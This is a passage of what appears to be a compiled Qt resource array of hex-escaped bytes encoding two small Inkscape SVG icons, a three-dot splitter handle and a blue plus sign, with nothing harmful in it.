\x3d\x22\x73\x76\x67\x38\x22\x0a\x20\x20\x20\x69\x6e\x6b\x73\x63\
\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x30\x2e\x39\
\x32\x2e\x31\x20\x72\x22\x0a\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\
\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\x22\x73\x70\x6c\x69\
\x74\x74\x65\x72\x5f\x68\x61\x6e\x64\x6c\x65\x5f\x68\x6f\x72\x69\
\x7a\x6f\x6e\x74\x61\x6c\x2e\x73\x76\x67\x22\x3e\x0a\x20\x20\x3c\
\x64\x65\x66\x73\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x64\x65\
\x66\x73\x32\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x73\x6f\x64\x69\x70\
\x6f\x64\x69\x3a\x6e\x61\x6d\x65\x64\x76\x69\x65\x77\x0a\x20\x20\
\x20\x20\x20\x69\x64\x3d\x22\x62\x61\x73\x65\x22\x0a\x20\x20\x20\
\x20\x20\x70\x61\x67\x65\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x66\x66\
\x66\x66\x66\x66\x22\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\x65\
\x72\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x36\x36\x36\x36\x36\x36\x22\
\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\x65\x72\x6f\x70\x61\x63\
\x69\x74\x79\x3d\x22\x31\x2e\x30\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\x6f\x70\x61\x63\
\x69\x74\x79\x3d\x22\x30\x2e\x30\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\x73\x68\x61\x64\
\x6f\x77\x3d\x22\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3a\x7a\x6f\x6f\x6d\x3d\x22\x31\x31\x2e\x32\x22\
\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\
\x78\x3d\x22\x32\x38\x2e\x36\x38\x32\x36\x33\x36\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x79\x3d\x22\
\x31\x33\x2e\x37\x30\x30\x31\x30\x37\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x64\x6f\x63\x75\x6d\x65\x6e\
\x74\x2d\x75\x6e\x69\x74\x73\x3d\x22\x6d\x6d\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x75\x72\x72\x65\
\x6e\x74\x2d\x6c\x61\x79\x65\x72\x3d\x22\x6c\x61\x79\x65\x72\x31\
\x22\x0a\x20\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x72\x69\x64\x3d\
\x22\x66\x61\x6c\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x77\x69\x64\
\x74\x68\x3d\x22\x31\x39\x32\x30\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x68\
\x65\x69\x67\x68\x74\x3d\x22\x31\x31\x34\x31\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\
\x77\x2d\x78\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x79\x3d\x22\
\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x6d\x61\x78\x69\x6d\x69\x7a\x65\
\x64\x3d\x22\x31\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x6d\x65\x74\x61\
\x64\x61\x74\x61\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6d\x65\
\x74\x61\x64\x61\x74\x61\x35\x22\x3e\x0a\x20\x20\x20\x20\x3c\x72\
\x64\x66\x3a\x52\x44\x46\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x63\
\x63\x3a\x57\x6f\x72\x6b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\
\x72\x64\x66\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\x3e\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\
\x3e\x69\x6d\x61\x67\x65\x2f\x73\x76\x67\x2b\x78\x6d\x6c\x3c\x2f\
\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x3c\x64\x63\x3a\x74\x79\x70\x65\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x72\x65\x73\x6f\x75\
\x72\x63\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\
\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x64\x63\x6d\x69\x74\x79\x70\x65\
\x2f\x53\x74\x69\x6c\x6c\x49\x6d\x61\x67\x65\x22\x20\x2f\x3e\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\
\x65\x3e\x3c\x2f\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\x0a\x20\x20\
\x20\x20\x20\x20\x3c\x2f\x63\x63\x3a\x57\x6f\x72\x6b\x3e\x0a\x20\
\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x52\x44\x46\x3e\x0a\x20\x20\
\x3c\x2f\x6d\x65\x74\x61\x64\x61\x74\x61\x3e\x0a\x20\x20\x3c\x67\
\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\
\x61\x62\x65\x6c\x3d\x22\x45\x62\x65\x6e\x65\x20\x31\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\
\x75\x70\x6d\x6f\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\
\x20\x20\x20\x20\x69\x64\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\
\x20\x20\x20\x20\x20\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x3d\x22\
\x74\x72\x61\x6e\x73\x6c\x61\x74\x65\x28\x30\x2c\x2d\x32\x38\x39\
\x29\x22\x3e\x0a\x20\x20\x20\x20\x3c\x63\x69\x72\x63\x6c\x65\x0a\
\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\
\x6c\x6c\x3a\x23\x30\x30\x30\x30\x30\x30\x3b\x66\x69\x6c\x6c\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\
\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\
\x74\x68\x3a\x30\x2e\x32\x35\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6d\
\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\x72\x6f\
\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\x6f\x6e\
\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\
\x3a\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x70\
\x61\x74\x68\x34\x34\x38\x37\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x63\x78\x3d\x22\x32\x2e\x30\x31\x33\x35\x30\x34\x35\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x63\x79\x3d\x22\x32\x39\x33\x2e\x30\x38\
\x36\x34\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x72\x3d\x22\x31\
\x2e\x39\x31\x33\x35\x30\x34\x35\x22\x20\x2f\x3e\x0a\x20\x20\x20\
\x20\x3c\x63\x69\x72\x63\x6c\x65\x0a\x20\x20\x20\x20\x20\x20\x20\
\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x30\x30\x30\
\x30\x30\x30\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\
\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\x6e\x65\x3b\x73\
\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x30\x2e\x32\x35\
\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\
\x69\x74\x3a\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\
\x61\x72\x72\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\
\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x34\x34\x38\x37\
\x2d\x36\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x78\x3d\x22\x37\
\x2e\x39\x31\x33\x35\x30\x34\x36\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x63\x79\x3d\x22\x32\x39\x33\x2e\x30\x38\x36\x34\x39\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x72\x3d\x22\x31\x2e\x39\x31\x33\x35\
\x30\x34\x35\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x63\x69\x72\
\x63\x6c\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\
\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x30\x30\x30\x30\x30\x30\x3b\x66\
\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\
\x72\x6f\x6b\x65\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\
\x2d\x77\x69\x64\x74\x68\x3a\x30\x2e\x32\x35\x3b\x73\x74\x72\x6f\
\x6b\x65\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\
\x73\x74\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\
\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\
\x63\x69\x74\x79\x3a\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x70\x61\x74\x68\x34\x34\x38\x37\x2d\x37\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x63\x78\x3d\x22\x31\x34\x2e\x30\x31\x33\
\x35\x30\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x79\x3d\x22\
\x32\x39\x33\x2e\x30\x38\x36\x34\x39\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x72\x3d\x22\x31\x2e\x39\x31\x33\x35\x30\x34\x35\x22\x20\
\x2f\x3e\x0a\x20\x20\x3c\x2f\x67\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\
\x0a\
\x00\x00\x0a\x38\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\
\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\
\x2e\x31\x2f\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\
\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\
\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\
\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\
\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\
\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\
\x73\x6f\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\
\x44\x54\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\
\x74\x64\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\
\x61\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x22\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x33\x32\
\x70\x78\x22\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x33\
\x32\x70\x78\x22\x0a\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\
\x22\x30\x20\x30\x20\x33\x32\x20\x33\x32\x22\x0a\x20\x20\x20\x76\
\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\
\x69\x64\x3d\x22\x53\x56\x47\x52\x6f\x6f\x74\x22\x0a\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x30\x2e\x39\x32\x2e\x31\x20\x72\x22\x0a\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\
\x22\x70\x6c\x75\x73\x2e\x73\x76\x67\x22\x3e\x0a\x20\x20\x3c\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6e\x61\x6d\x65\x64\x76\x69\x65\
\x77\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x62\x61\x73\x65\x22\
\x0a\x20\x20\x20\x20\x20\x70\x61\x67\x65\x63\x6f\x6c\x6f\x72\x3d\
\x22\x23\x66\x66\x66\x66\x66\x66\x22\x0a\x20\x20\x20\x20\x20\x62\
\x6f\x72\x64\x65\x72\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x36\x36\x36\
\x36\x36\x36\x22\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\x65\x72\
\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x31\x2e\x30\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\
\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x30\x2e\x30\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\
\x73\x68\x61\x64\x6f\x77\x3d\x22\x32\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x7a\x6f\x6f\x6d\x3d\x22\x31\
\x36\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x63\x78\x3d\x22\x32\x30\x2e\x33\x38\x34\x37\x34\x33\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x79\
\x3d\x22\x31\x37\x2e\x33\x39\x30\x36\x32\x35\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x64\x6f\x63\x75\x6d\
\x65\x6e\x74\x2d\x75\x6e\x69\x74\x73\x3d\x22\x70\x78\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x75\x72\
\x72\x65\x6e\x74\x2d\x6c\x61\x79\x65\x72\x3d\x22\x6c\x61\x79\x65\
\x72\x31\x22\x0a\x20\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x72\x69\
\x64\x3d\x22\x66\x61\x6c\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x77\
\x69\x64\x74\x68\x3d\x22\x31\x39\x32\x30\x22\x0a\x20\x20\x20\x20\
\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\
\x2d\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x31\x34\x31\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\
\x64\x6f\x77\x2d\x78\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x79\
\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x6d\x61\x78\x69\x6d\x69\
\x7a\x65\x64\x3d\x22\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x67\x72\x69\x64\x2d\x62\x62\x6f\x78\x3d\
\x22\x74\x72\x75\x65\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x64\x65\x66\
\x73\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x64\x65\x66\x73\x34\
\x34\x38\x35\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x6d\x65\x74\x61\x64\
\x61\x74\x61\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6d\x65\x74\
\x61\x64\x61\x74\x61\x34\x34\x38\x38\x22\x3e\x0a\x20\x20\x20\x20\
\x3c\x72\x64\x66\x3a\x52\x44\x46\x3e\x0a\x20\x20\x20\x20\x20\x20\
\x3c\x63\x63\x3a\x57\x6f\x72\x6b\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x72\x64\x66\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\x3e\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\
\x61\x74\x3e\x69\x6d\x61\x67\x65\x2f\x73\x76\x67\x2b\x78\x6d\x6c\
\x3c\x2f\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x79\x70\x65\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x72\x65\x73\
\x6f\x75\x72\x63\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\
\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x64\x63\x6d\x69\x74\x79\
\x70\x65\x2f\x53\x74\x69\x6c\x6c\x49\x6d\x61\x67\x65\x22\x20\x2f\
\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\
\x74\x6c\x65\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x63\
\x63\x3a\x57\x6f\x72\x6b\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x72\x64\
\x66\x3a\x52\x44\x46\x3e\x0a\x20\x20\x3c\x2f\x6d\x65\x74\x61\x64\
\x61\x74\x61\x3e\x0a\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\x6d\x6f\
\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\x6c\x3d\x22\
\x45\x62\x65\x6e\x65\x20\x31\x22\x3e\x0a\x20\x20\x20\x20\x3c\x74\
\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x3a\x73\
\x70\x61\x63\x65\x3d\x22\x70\x72\x65\x73\x65\x72\x76\x65\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x6f\
\x6e\x74\x2d\x73\x74\x79\x6c\x65\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\
\x66\x6f\x6e\x74\x2d\x76\x61\x72\x69\x61\x6e\x74\x3a\x6e\x6f\x72\
\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x77\x65\x69\x67\x68\x74\x3a\
\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x73\x74\x72\x65\
\x74\x63\x68\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\
\x73\x69\x7a\x65\x3a\x38\x70\x78\x3b\x6c\x69\x6e\x65\x2d\x68\x65\
\x69\x67\x68\x74\x3a\x31\x2e\x32\x35\x3b\x66\x6f\x6e\x74\x2d\x66\
\x61\x6d\x69\x6c\x79\x3a\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\
\x64\x65\x20\x50\x72\x6f\x27\x3b\x2d\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x2d\x66\x6f\x6e\x74\x2d\x73\x70\x65\x63\x69\x66\x69\x63\x61\
\x74\x69\x6f\x6e\x3a\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\x64\
\x65\x20\x50\x72\x6f\x27\x3b\x6c\x65\x74\x74\x65\x72\x2d\x73\x70\
\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x77\x6f\x72\x64\x2d\x73\
\x70\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x66\x69\x6c\x6c\x3a\
\x23\x30\x30\x30\x30\x30\x30\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\
\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\
\x6e\x65\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x78\x3d\x22\x38\x2e\
\x33\x37\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x79\x3d\x22\x37\
\x2e\x38\x37\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x74\x65\x78\x74\x35\x30\x39\x31\x22\x3e\x3c\x74\x73\x70\x61\
\x6e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\
\x6f\x64\x69\x3a\x72\x6f\x6c\x65\x3d\x22\x6c\x69\x6e\x65\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x74\x73\x70\
\x61\x6e\x35\x30\x38\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x78\x3d\x22\x38\x2e\x33\x37\x35\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x79\x3d\x22\x31\x34\x2e\x38\x37\x35\x22\x20\x2f\
\x3e\x3c\x2f\x74\x65\x78\x74\x3e\x0a\x20\x20\x20\x20\x3c\x67\x0a\
\x20\x20\x20\x20\x20\x20\x20\x61\x72\x69\x61\x2d\x6c\x61\x62\x65\
\x6c\x3d\x22\x2b\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\
\x6c\x65\x3d\x22\x66\x6f\x6e\x74\x2d\x73\x74\x79\x6c\x65\x3a\x6e\
\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x76\x61\x72\x69\x61\
\x6e\x74\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x77\
\x65\x69\x67\x68\x74\x3a\x39\x30\x30\x3b\x66\x6f\x6e\x74\x2d\x73\
\x74\x72\x65\x74\x63\x68\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\
\x6e\x74\x2d\x73\x69\x7a\x65\x3a\x35\x33\x2e\x33\x33\x33\x33\x33\
\x32\x30\x36\x70\x78\x3b\x6c\x69\x6e\x65\x2d\x68\x65\x69\x67\x68\
\x74\x3a\x31\x2e\x32\x35\x3b\x66\x6f\x6e\x74\x2d\x66\x61\x6d\x69\
\x6c\x79\x3a\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\x64\x65\x20\
\x50\x72\x6f\x27\x3b\x2d\x69\x6e\x6b\x73\x63\x61\x70\x65\x2d\x66\
\x6f\x6e\x74\x2d\x73\x70\x65\x63\x69\x66\x69\x63\x61\x74\x69\x6f\
\x6e\x3a\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\x64\x65\x20\x50\
\x72\x6f\x20\x48\x65\x61\x76\x79\x27\x3b\x6c\x65\x74\x74\x65\x72\
\x2d\x73\x70\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x77\x6f\x72\
\x64\x2d\x73\x70\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x66\x69\
\x6c\x6c\x3a\x23\x30\x30\x35\x35\x64\x34\x3b\x66\x69\x6c\x6c\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\
\x3a\x6e\x6f\x6e\x65\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\
\x3d\x22\x74\x65\x78\x74\x35\x37\x30\x37\x22\x3e\x0a\x20\x20\x20\
\x20\x20\x20\x3c\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x64\x3d\x22\x6d\x20\x31\x32\x2e\x37\x35\x35\x38\x33\x33\
\x2c\x32\x38\x2e\x38\x38\x37\x35\x20\x68\x20\x36\x2e\x36\x31\x33\
\x33\x33\x33\x20\x76\x20\x2d\x39\x2e\x36\x20\x68\x20\x39\x2e\x32\
\x38\x20\x76\x20\x2d\x36\x2e\x34\x20\x68\x20\x2d\x39\x2e\x32\x38\
\x20\x56\x20\x33\x2e\x32\x38\x37\x35\x30\x30\x37\x20\x48\x20\x31\
\x32\x2e\x37\x35\x35\x38\x33\x33\x20\x56\x20\x31\x32\x2e\x38\x38\
\x37\x35\x20\x48\x20\x33\x2e\x34\x37\x35\x38\x33\x33\x33\x20\x76\
\x20\x36\x2e\x34\x20\x68\x20\x39\x2e\x32\x37\x39\x39\x39\x39\x37\
\x20\x7a\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\
\x6c\x65\x3d\x22\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x70\x61\x74\x68\x35\x37\x30\x39\x22\x20\x2f\x3e\x0a\
\x20\x20\x20\x20\x3c\x2f\x67\x3e\x0a\x20\x20\x3c\x2f\x67\x3e\x0a\
\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x00\x09\x03\
\x3c\
